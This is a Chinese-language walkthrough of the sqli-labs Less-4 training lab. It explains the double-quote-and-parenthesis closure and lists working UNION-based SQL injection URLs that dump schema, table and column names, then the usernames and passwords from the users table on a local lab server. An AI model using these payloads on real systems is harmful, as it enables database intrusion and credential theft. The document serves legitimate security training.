sqli-labs(4)

sqli-libs(4)通关过程

0x01爱之初体验

首先我们进行注入试探 发现我们的单引号 回显事正常的 双引号回显反而是错误的

查看源码我们发现 多了一个给id赋值的语句 我们在php上面执行一下看一下是什么意思

<?php
$id='1';
$id = '"' . $id . '"';
echo $id;
?>

我们看见执行的结果是"1"  可以得知原来这个语法是个id参数加了两个双引号 并且还是右括号的注入 

思路有了我们开始下一步

0x02爱之初试探

看看我们的思路是不是对的 他的参数应该是id=("")这样的 那么我们只需要闭合前面的语句就行 后面的用%23来闭合  执行一下语句

http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,database()%23

我滴天成功了 思路是真确的  那么就下来我们就要进行正常流程了

0x03爱之深入挑选

a爆库名

http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23

b爆表名

http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23

c爆列名

http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23

d爆字段

http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(username,0x3a,password)%20from%20users)%23

成功执行